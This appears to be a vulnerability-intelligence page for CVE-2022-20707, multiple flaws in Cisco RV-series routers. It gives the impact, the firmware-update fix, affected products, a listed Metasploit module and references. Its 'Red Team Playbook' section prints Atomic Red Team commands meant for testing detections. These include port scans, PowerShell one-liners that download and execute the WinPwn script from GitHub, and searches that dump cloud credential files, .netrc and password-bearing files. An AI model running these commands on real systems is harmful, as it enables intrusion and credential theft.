CVE-2022-20707
Overview
The vulnerabilities in Cisco Small Business RV Series Router Firmware stem from multiple memory corruption issues including stack-based buffer overflows and improper input validation in the router's firmware components. These flaws affect the processing of network management and command execution functions within the RV160, RV260, RV340, and RV345 series, allowing manipulation of internal memory structures. The root cause involves insufficient bounds checking and inadequate authentication enforcement in firmware modules handling remote requests and software execution.
Vulnerability Description
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
Impact
An unauthenticated remote attacker with network access can exploit these vulnerabilities to execute arbitrary code, elevate privileges, bypass authentication, and cause denial of service on affected routers. This enables full control over the device, allowing unauthorized configuration changes, deployment of malicious software, and disruption of network services. The CVSS vector (AV:N/AC:L/PR:N/UI:N) indicates no authentication or user interaction is required, increasing the attack surface and potential for widespread compromise in business environments relying on these routers.
Solution
Cisco has released firmware updates addressing these vulnerabilities for the RV160, RV260, RV340, and RV345 series routers as detailed in Cisco Security Advisory cisco-sa-smb-mult-vuln-KA9PK6D. Administrators should apply the latest firmware versions available from Cisco's official support site. Additional technical details and patch instructions are provided in the advisory and related ZDI advisories (ZDI-22-411, ZDI-22-409, ZDI-22-419). No alternative workarounds are recommended; prompt firmware upgrade is the primary mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerabilities present in Cisco's Small Business RV160, RV260, RV340, and RV345 Series Routers are multifaceted, allowing for a range of malicious activities that can severely compromise network security. These vulnerabilities stem from flaws in the firmware that can be exploited to execute arbitrary code, elevate privileges, and bypass authentication mechanisms. The ability to fetch and run unsigned software further exacerbates the risk, as it opens the door for the installation of unverified and potentially harmful applications. Additionally, the potential for denial of service (DoS) attacks can disrupt business operations, making these vulnerabilities particularly concerning for organizations relying on these devices for their network infrastructure.
Attack vectors for these vulnerabilities are varied and can be executed through multiple means. An attacker could exploit these weaknesses remotely, leveraging crafted packets or malicious payloads to gain unauthorized access to the router's administrative functions. Once inside, the attacker could escalate privileges to gain control over the device, allowing for further exploitation of the network. Scenarios could include intercepting sensitive data, redirecting traffic, or even launching attacks on other connected devices. The ease of access to these routers, often deployed in small to medium-sized businesses, makes them attractive targets for cybercriminals looking to exploit weak security postures.
The real-world impact of these vulnerabilities is significant. Organizations that utilize these routers may face severe business risks, including data breaches, loss of customer trust, and potential regulatory penalties. The ability to execute arbitrary commands and bypass authentication could lead to unauthorized access to sensitive information, while the potential for denial of service attacks could cripple business operations. Furthermore, the installation of unsigned software could introduce malware into the network, leading to further exploitation and data loss. The financial implications of such incidents can be profound, with costs associated with remediation, legal liabilities, and reputational damage.
To detect and mitigate these vulnerabilities, organizations must adopt a proactive approach to cybersecurity. Regular firmware updates are essential, as they often contain patches that address known vulnerabilities. Implementing robust network segmentation can also help limit the impact of an exploit, ensuring that even if one device is compromised, the attacker cannot easily move laterally within the network. Intrusion detection systems (IDS) should be deployed to monitor for unusual activity that may indicate an ongoing attack. Additionally, organizations should conduct regular security assessments and penetration testing to identify and remediate vulnerabilities before they can be exploited by malicious actors.
In conclusion, the vulnerabilities in Cisco's Small Business RV series routers present a serious threat to network security. The potential for arbitrary code execution, privilege escalation, and denial of service attacks underscores the need for organizations to remain vigilant. By implementing effective detection and mitigation strategies, businesses can protect themselves from the risks associated with these vulnerabilities and ensure the integrity of their network infrastructure. As cyber threats continue to evolve, maintaining a proactive security posture is essential for safeguarding sensitive information and maintaining operational continuity.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Rv340 Firmware | All |
cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv340w Firmware | All |
cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv345 Firmware | All |
cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv345p Firmware | All |
cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Cisco RV Series Authentication Bypass and Command Injection
exploits/linux/http/cisco_rv340_lan
|
Biem Pham, Neterum, jbaines-r7 | Unknown | - | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-20707 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D |
| zerodayinitiative.com |
GitHub CVE
|
https://www.zerodayinitiative.com/advisories/ZDI-22-411/ |
| zerodayinitiative.com |
GitHub CVE
|
https://www.zerodayinitiative.com/advisories/ZDI-22-409/ |
| zerodayinitiative.com |
GitHub CVE
|
https://www.zerodayinitiative.com/advisories/ZDI-22-419/ |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/170988/Cisco-RV-Series-Authentication-Bypass-Command-Injection.html |